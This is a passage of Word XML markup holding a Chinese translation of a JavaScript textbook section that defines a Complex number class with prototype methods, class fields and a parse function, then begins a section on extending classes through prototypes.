        <w:t>件定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>类，用来描述复数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>回忆一下，复数是实数和虚数的和，并且虚数</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个构造函数为它所创建的每个实例定义了实例字段</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这两个字段分别保存复数的实部和虚部</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它们是对象的状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Complex(real,imaginary){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isNaN(real)||isNaN(imaginary))//</w:t>
      </w:r>
      <w:r>
        <w:t>确保两个实参都是数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new TypeError();//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不都是数字则抛出错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.r=real;//</w:t>
      </w:r>
      <w:r>
        <w:t>复数的实部</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.i=imaginary;//</w:t>
      </w:r>
      <w:r>
        <w:t>复数的虚部</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>类的实例方法定义为原型对象的函数值属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这里定义的方法可以被所有实例继承，并为它们提供共享的行为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实例方法必须使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>来存取实例的字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当前复数对象加上另外一个复数，并返回一个新的计算和值后的复数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.add=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Complex(this.r+that.r,this.i+that.i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>当前复数乘以另外一个复数，并返回一个新的计算乘积之后的复数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.mul=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Complex(this.r*that.r-this.i*that.i,this.r*that.i+this.i*that.r);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>计算复数的模，复数的模定义为原点</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>到复平面的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.mag=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.sqrt(this.r*this.r+this.i*</w:t>
      </w:r>
      <w:r>
        <w:t>this.i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>复数的求负运算</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Complex.prototype.neg=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Complex(-this.r,-this.i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>将复数对象转换为一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.toString=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"{"+this.r+","+this.i+"}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>检测当前复数对象是否和另外一个复数值相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.equals=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return t</w:t>
      </w:r>
      <w:r>
        <w:t>hat!=null</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>必须有定义且不能是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>that.constructor===Complex</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且必须是</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.r===that.r</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>this.i===that.i;//</w:t>
      </w:r>
      <w:r>
        <w:t>并且必须包含相同的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>类字段（比如常量）和类方法直接定义为构造函数的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>需要注意的是，类的方法通常不使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它们只对其参数进行操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里预定义了一些对复数运算有帮助的类字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它们的命名全都是大写，用以表明它们是常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>（在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>中，还能设置这些类字段的属性为只读）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.ZERO=new Complex(0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.ONE=new Complex(1,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.I=new Complex(0,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>这个类方法将由实例对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的字符串格式解析为一个</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>或者抛出一个类型错误异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.parse=function(s){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>假设解析成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var m=Complex._format.exec(s);//</w:t>
      </w:r>
      <w:r>
        <w:t>利用正则表达式进行匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>turn new Complex(parseFloat(m[1]),parseFloat(m[2]));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}catch(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果解析失败则抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new TypeError("Can't parse'"+s+"'as a complex number.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义类的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>私有</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>字段，这个字段在</w:t>
      </w:r>
      <w:r>
        <w:t>Complex.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>中用到了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>下划线前缀表明它是类内部使用的，而不属于类的公有</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex._format=/^\{([^,]+),([^}]+)\}$/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中所定义的</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>类可以看出，我们用到了构造函数、实例字段、实例方法、类字段和类方法，看一下这段示例代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var c=new Complex(2,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>使用构造函数创建新的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d=new Complex(c.i,c.r);//</w:t>
      </w:r>
      <w:r>
        <w:t>用到了</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>的实例属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.add(d).toString();//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"{5,5}":</w:t>
      </w:r>
      <w:r>
        <w:t>使用了实例的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个稍微复杂的表达式用到了类方法和类字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.parse(c.toString()).//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add(c.neg())</w:t>
      </w:r>
      <w:r>
        <w:t>.//</w:t>
      </w:r>
      <w:r>
        <w:t>加上它的负数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>equals(Complex.ZERO)//</w:t>
      </w:r>
      <w:r>
        <w:t>结果应当永远是</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>零</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以模拟出</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>式的类成员，但</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中有很多重要的特性是无法在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类中模拟的。首先，对于</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类的实例方法来说，实例字段可以用做局部变量，而不需要使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来引用它们。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是没办法模拟这个特性的，但可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句来近似地实现这个功能（但这种做法并不推荐）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.toString=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(this){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"{"+r+","+i+"}";</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w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:t>声明字段为常量，并且可以将字段和方法声明为</w:t>
      </w:r>
      <w:r>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:t>，用以表示它们是私有成员且在类的外面是不可见的。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中没有这些关键字。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中使用了一些命名写法上的约定来给出一些暗示，比如哪些成员是不能修改的（以大写字母命名的命名），哪些成员在类外部是不可见的（以下划线</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为前缀的命名）。关于这两个主题的讨论在本章后续还会碰到：私有属性可以使用闭包里的局部变量来模拟（参照</w:t>
      </w:r>
      <w:r>
        <w:t>9.6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节），常</w:t>
      </w:r>
      <w:r>
        <w:t>量属性可以在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中直接实现（参照</w:t>
      </w:r>
      <w:r>
        <w:t>9.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="9_4_Lei_De_Kuo_Chong_"/>
      <w:r>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类的扩充</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中基于原型的继承机制是动态的：对象从其原型继承属性，如果创建对象之后原型的属性发生改变，也会影响到继承这个原型的所有实例对象。这意味着我们可以通过给原型对象添加新方法来扩充</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类。这里我们给例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>类添加方法来计算复数的共轭复数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回当前复数的共轭复数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Complex.prototype.conj=function(){return new Comple</w:t>
      </w:r>
      <w:r>
        <w:t>x(this.r,-this.i);};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>内置类的原型对象也是一样如此</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>开放</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，也就是说可以给数字、字符串、数组、函数等数据类型添加方法。在例</w:t>
      </w:r>
      <w:r>
        <w:t>8-5</w:t>
      </w:r>
      <w:r>
        <w:t>中我们曾给</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数类添加了</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法原来是没有的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
